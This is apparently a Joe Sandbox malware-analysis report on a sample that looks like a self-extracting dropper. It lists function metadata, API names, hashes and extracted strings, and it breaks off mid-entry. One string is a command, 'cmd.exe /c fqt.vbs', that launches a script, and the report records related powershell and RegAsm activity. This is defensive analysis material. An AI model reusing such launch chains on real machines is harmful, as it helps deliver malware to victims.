                                                                      • Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                      • String ID: <None>$LICENSE
                                                                      • API String ID: 2414642746-383193767
                                                                      • Opcode ID: 500bea89e5f40005163dcf95b2e3e849d331b5811c5609ba5abe631ca88a2bf8
                                                                      • Instruction ID: 237456d6334a9d06d4f7d0f79a5ab6f568928330c51f66706883dac666f46c45
                                                                      • Opcode Fuzzy Hash: 500bea89e5f40005163dcf95b2e3e849d331b5811c5609ba5abe631ca88a2bf8
                                                                      • Instruction Fuzzy Hash: 1B311922E19E0A86E710BB60AC1577FB660EB95785FC89136DB0D46694DF7DB00A8F20
                                                                      Function 00007FF7D6FD772C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00007FF7D6FD114C: _vsnprintf.MSVCRT ref: 00007FF7D6FD1189
                                                                      • LoadResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF7D6FD606F), ref: 00007FF7D6FD7763
                                                                      • LockResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF7D6FD606F), ref: 00007FF7D6FD7772
                                                                      • FreeResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF7D6FD606F), ref: 00007FF7D6FD77B8
                                                                      • FindResourceA.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF7D6FD606F), ref: 00007FF7D6FD77EC
                                                                      • FreeResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF7D6FD606F), ref: 00007FF7D6FD7805
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                      • String ID: UPDFILE%lu
                                                                      • API String ID: 2922116661-2329316264
                                                                      • Opcode ID: 5da28ac000a46b9a165e15456f701c43c89cc60981a221babc32eae9389c35de
                                                                      • Instruction ID: 757edd174138010a68a90295b7b7f235e295bf5a71f4ac743555e87d59d62d7e
                                                                      • Opcode Fuzzy Hash: 5da28ac000a46b9a165e15456f701c43c89cc60981a221babc32eae9389c35de
                                                                      • Instruction Fuzzy Hash: 30314132E08E4586E710AB55A80026EF6A1FB99B50FD98636DB5D07794CF3CF406CB10
                                                                      Function 00007FF7D6FD5050 Relevance: 10.6, APIs: 7, Instructions: 57COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                      • String ID:
                                                                      • API String ID: 3370778649-0
                                                                      • Opcode ID: 354dd0a735b34388ad5f877ea76a86da7b7875453ded65a43a8ee6639794adbd
                                                                      • Instruction ID: a934b73dddf0a5a02af01f5670b6a0a686b0f0f7fa4f957835b8d52716996de1
                                                                      • Opcode Fuzzy Hash: 354dd0a735b34388ad5f877ea76a86da7b7875453ded65a43a8ee6639794adbd
                                                                      • Instruction Fuzzy Hash: A9111D21B08F4587E7146F62A84417EFAA0EB4EFC1BC99139DE0E43754DE3CE4468A10
                                                                      Function 00007FF7D6FD2244 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                      • String ID: wininit.ini
                                                                      • API String ID: 3273605193-4206010578
                                                                      • Opcode ID: 199b65378ca9828830684770953ab38004a5dc8256a53cff6ace6da1301a0c22
                                                                      • Instruction ID: 401c42fe226e97317ecc433bc13d0969f59bf2e5bfcfbf9a5100aaf90ebb093d
                                                                      • Opcode Fuzzy Hash: 199b65378ca9828830684770953ab38004a5dc8256a53cff6ace6da1301a0c22
                                                                      • Instruction Fuzzy Hash: 4F112E32A04A4587E710AB61EC542AEB6A1FBCD705FC98232DB4E43654DE3CE50ACA10
                                                                      Function 00007FF7D6FD3840 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Text$DesktopDialogForegroundItem
                                                                      • String ID: cmd.exe /c fqt.vbs
                                                                      • API String ID: 761066910-3590164600
                                                                      • Opcode ID: db38f3c764be4f10092f313c704ee52b3d278942d11ca53377af995edae986b7
                                                                      • Instruction ID: b709c2cf4903e2c5cf79097b85d797625480218f0ae55f5b9591ad6f7951a65d
                                                                      • Opcode Fuzzy Hash: db38f3c764be4f10092f313c704ee52b3d278942d11ca53377af995edae986b7
                                                                      • Instruction Fuzzy Hash: CD111F72D4CB4A86E6543B55AC043BEEA51EB4BB41FCC9132CB0E56394CE3DB4468A20
                                                                      Function 00007FF7D6FD494C Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 55memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00007FF7D6FD5050: FindResourceA.KERNEL32(?,?,00000000,00007FF7D6FD2E43), ref: 00007FF7D6FD5078
                                                                        • Part of subcall function 00007FF7D6FD5050: SizeofResource.KERNEL32(?,?,00000000,00007FF7D6FD2E43), ref: 00007FF7D6FD5089
                                                                        • Part of subcall function 00007FF7D6FD5050: FindResourceA.KERNEL32(?,?,00000000,00007FF7D6FD2E43), ref: 00007FF7D6FD50AF
                                                                        • Part of subcall function 00007FF7D6FD5050: LoadResource.KERNEL32(?,?,00000000,00007FF7D6FD2E43), ref: 00007FF7D6FD50C0
                                                                        • Part of subcall function 00007FF7D6FD5050: LockResource.KERNEL32(?,?,00000000,00007FF7D6FD2E43), ref: 00007FF7D6FD50CF
                                                                        • Part of subcall function 00007FF7D6FD5050: memcpy_s.MSVCRT ref: 00007FF7D6FD50EE
                                                                        • Part of subcall function 00007FF7D6FD5050: FreeResource.KERNEL32(?,?,00000000,00007FF7D6FD2E43), ref: 00007FF7D6FD50FD
                                                                      • LocalAlloc.KERNEL32(?,?,?,?,00000000,00007FF7D6FD3388), ref: 00007FF7D6FD4975
                                                                      • LocalFree.KERNEL32(?,?,?,?,00000000,00007FF7D6FD3388), ref: 00007FF7D6FD4A11
                                                                        • Part of subcall function 00007FF7D6FD4DCC: LoadStringA.USER32 ref: 00007FF7D6FD4E60
                                                                        • Part of subcall function 00007FF7D6FD4DCC: MessageBoxA.USER32 ref: 00007FF7D6FD4EA0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                      • String ID: <None>$@$FINISHMSG
                                                                      • API String ID: 3507850446-4126004490
                                                                      • Opcode ID: aedc0cb394021a63a9408eb451deeea95bc994a5d044e743d2e3e1f25989d2fa
                                                                      • Instruction ID: 12be925102a129e03dcfc87594f1778960ba4f00ec2c9693f2193dd09ede2819
                                                                      • Opcode Fuzzy Hash: aedc0cb394021a63a9408eb451deeea95bc994a5d044e743d2e3e1f25989d2fa
                                                                      • Instruction Fuzzy Hash: BF116272E08A4687F720AB20E85177FB691EB99795FC89136DB4E42684DF3CE0068F14
                                                                      Function 00007FF7D6FD79F0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 48libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: LibraryLoad$AttributesFile
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$advpack.dll
                                                                      • API String ID: 438848745-3680919256
                                                                      • Opcode ID: 9f0cd13c1bb279af47be13cee5dd35000d2da7fbef8f0ef7de7ad0cc9ac3dbe3
                                                                      • Instruction ID: b4be7f7bb6c33c2682e4df96877e3a45f8deee8c11dafc6db98a65f1a7bdf26d
                                                                      • Opcode Fuzzy Hash: 9f0cd13c1bb279af47be13cee5dd35000d2da7fbef8f0ef7de7ad0cc9ac3dbe3
                                                                      • Instruction Fuzzy Hash: EC115331E18E8A95EA11AB10D8403FEB7A0FB55704FC81132C68D466A1CF3CE60BCB10
                                                                      Function 00007FF7D6FD1500 Relevance: 7.6, APIs: 5, Instructions: 50windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                      • String ID:
                                                                      • API String ID: 1273765764-0
                                                                      • Opcode ID: d24c32f5bf32a5b72a732329d1a2a01ce98f5d85b6cb7ead8bb70bc12569425c
                                                                      • Instruction ID: 5b36b48b733d841fb62ea0e341c125c20e1fc24a7f5ed37ff7582d122319d618
                                                                      • Opcode Fuzzy Hash: d24c32f5bf32a5b72a732329d1a2a01ce98f5d85b6cb7ead8bb70bc12569425c
                                                                      • Instruction Fuzzy Hash: 61112461D08E8986EA506B54A8443BEE7A1FB99B55FC84332CB5E06395CF3CE0468B50
                                                                      Function 00007FF7D6FD3BF4 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 236windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: EnumLanguagesMessageResourceVersion$BeepCharCloseMetricsNextOpenQuerySystemValue
                                                                      • String ID: cmd.exe /c fqt.vbs
                                                                      • API String ID: 2312377310-3590164600
                                                                      • Opcode ID: 6925faca6a2cd81837304f5f4f2fd7570e59ff5b7a5509a8ec541a78deb6dc36
                                                                      • Instruction ID: eb217dce76fd8fc0de4ca08e474ec774b7a860d0b565c1dd55914e8496718de7
                                                                      • Opcode Fuzzy Hash: 6925faca6a2cd81837304f5f4f2fd7570e59ff5b7a5509a8ec541a78deb6dc36
                                                                      • Instruction Fuzzy Hash: 6DA19233E1995A86F764AB119C442BFE6A5BB46750FD90137EB0D83284CA3DF8478F20
                                                                      Function 00007FF7D6FD78B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: File$CloseCreateHandleWrite
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                      • API String ID: 1065093856-305352358
                                                                      • Opcode ID: 0f65b1997a9f98f28a06f8ce24cdc0a961af7feeb94d9fcacdfae0386ba340ac
                                                                      • Instruction ID: 9679b2e0093b8dbe3015e3495f05877b47619f9214472bc4314cf7e83e4c8b0e
                                                                      • Opcode Fuzzy Hash: 0f65b1997a9f98f28a06f8ce24cdc0a961af7feeb94d9fcacdfae0386ba340ac
                                                                      • Instruction Fuzzy Hash: F8319232A08A8586EB109F50E8407AEF760FB49794FC84236DB9D47794CF7CE40ACB10
                                                                      Function 00007FF7D6FD8470 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                      • String ID:
                                                                      • API String ID: 140117192-0
                                                                      • Opcode ID: 2331a3b639adea238e9a50b849fe14964fd45a281eaa4897dacf7bdda2e71fe4
                                                                      • Instruction ID: 575c9bfbb3d879aebcb43db6bccb43bca15830bed8516df62e9604bf42fd502d
                                                                      • Opcode Fuzzy Hash: 2331a3b639adea238e9a50b849fe14964fd45a281eaa4897dacf7bdda2e71fe4
                                                                      • Instruction Fuzzy Hash: 0141D975E08F0981EA10AB59FC9036AB369FB85784FD85136DA8D82764DF3DE046CB20
                                                                      Function 00007FF7D6FD7C40 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: Char$Prev$Next
                                                                      • String ID:
                                                                      • API String ID: 3260447230-0
                                                                      • Opcode ID: 707050412bb26cc287988f04cda4ab0ae1f580e9279edb24177e5c3a1430149b
                                                                      • Instruction ID: e1fb256ec1613cfbfe9f8e0e8c252ffb53f0b03ba3edab8b7401dd3dd66db0f9
                                                                      • Opcode Fuzzy Hash: 707050412bb26cc287988f04cda4ab0ae1f580e9279edb24177e5c3a1430149b
                                                                      • Instruction Fuzzy Hash: 9D119462E08E8585EB112B55AD0027EEA91E749FE1FCD8271DB5A06784CF2CA4428B10
                                                                      Function 00007FF7D6FD8648 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                      • String ID:
                                                                      • API String ID: 140117192-0
                                                                      • Opcode ID: f2b1ddacced677a847f8148696c66bf38e9a023ccacb3690f052d0a45ab1694c
                                                                      • Instruction ID: 7627395d2d64e1858876b9baa61b88fa7601d469cf87488e74871294bc120ed6
                                                                      • Opcode Fuzzy Hash: f2b1ddacced677a847f8148696c66bf38e9a023ccacb3690f052d0a45ab1694c
                                                                      • Instruction Fuzzy Hash: 4421B035D18F4982E700AB45EC8036AB3A9FB85B59FD85236DB8D42764DF7DE046CB20
                                                                      Function 00007FF7D6FD3B40 Relevance: 6.0, APIs: 4, Instructions: 43windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                      • String ID:
                                                                      • API String ID: 2776232527-0
                                                                      • Opcode ID: 7c1b033473dba301dd4ecd47eb6d04f722b5b1254afffa929906cb3dfbdd32c6
                                                                      • Instruction ID: eef0d2ea0983a2dd078c975091904a9cc67af1f6a737b406d4c11bfc5a0ddb23
                                                                      • Opcode Fuzzy Hash: 7c1b033473dba301dd4ecd47eb6d04f722b5b1254afffa929906cb3dfbdd32c6
                                                                      • Instruction Fuzzy Hash: EC114633E18E4687E7A05B60E844BBBFA90FB95745FC49135D74A42984DF3CE049CE10

                                                                      Executed Functions

                                                                      Function 00007FFD9B8B37B5 Relevance: .0, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2396496026.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_7ffd9b8b0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                      • Instruction ID: ad11833d54da4bcaa44fa23ccdbb85ddc80141cc9248b7fa53866c9f89e6517d
                                                                      • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                      • Instruction Fuzzy Hash: 9C01A77020CB0D8FD748EF0CE451AA6B3E0FB89320F10056EE58AC36A1D632E882CB45

                                                                      Executed Functions

                                                                      Function 068A3F50 Relevance: 1.8, Strings: 1, Instructions: 520COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2118419746.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_68a0000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $^q
                                                                      • API String ID: 0-388095546
                                                                      • Opcode ID: aba49721c9a9d9d6dda206ed881f39d4611ce5c1804d0282c64cc20ab33a5ac7
                                                                      • Instruction ID: 7a983ab5b5564dff83b542dc67e09d2dada231d0eccc0f48cd04629893413bf6
                                                                      • Opcode Fuzzy Hash: aba49721c9a9d9d6dda206ed881f39d4611ce5c1804d0282c64cc20ab33a5ac7
                                                                      • Instruction Fuzzy Hash: A7126C34B002158FDB55DF79C584AAEBBF2BF88710B148169E906EB365DB71EC42CB90
                                                                      Function 068A67D8 Relevance: .4, Instructions: 415COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2118419746.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_68a0000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b20faa718a6945c473e79c7c387082988b9ca0238ea40499bbbd1666a8f57393
                                                                      • Instruction ID: 8d0b628c15b643d76cbd821bf2c1d5f19254d91afc7747646d258b37806096ac
                                                                      • Opcode Fuzzy Hash: b20faa718a6945c473e79c7c387082988b9ca0238ea40499bbbd1666a8f57393
                                                                      • Instruction Fuzzy Hash: 9DF1A271A003099FDB05DF68D984B9EBBF2EF44304F188569E905EB265EB30ED85CB91
                                                                      Function 068AA3D8 Relevance: .3, Instructions: 292COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2118419746.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_68a0000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 88e60a8950dc661aab415a627a45e3ec2223f9c33145d57dd0b7b31fdb49610d
                                                                      • Instruction ID: 24eef07364c4e1575101d7fa640a70a4689a929f5347f84671226c26cc6f06c5
                                                                      • Opcode Fuzzy Hash: 88e60a8950dc661aab415a627a45e3ec2223f9c33145d57dd0b7b31fdb49610d
                                                                      • Instruction Fuzzy Hash: 61D1E570D00318CFCB58EFB4D854AADBBB2FF8A305F108169E50AAB654DB319986CF11
                                                                      Function 02F75F50 Relevance: 93.3, Strings: 74, Instructions: 826COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2079062373.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_2f70000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
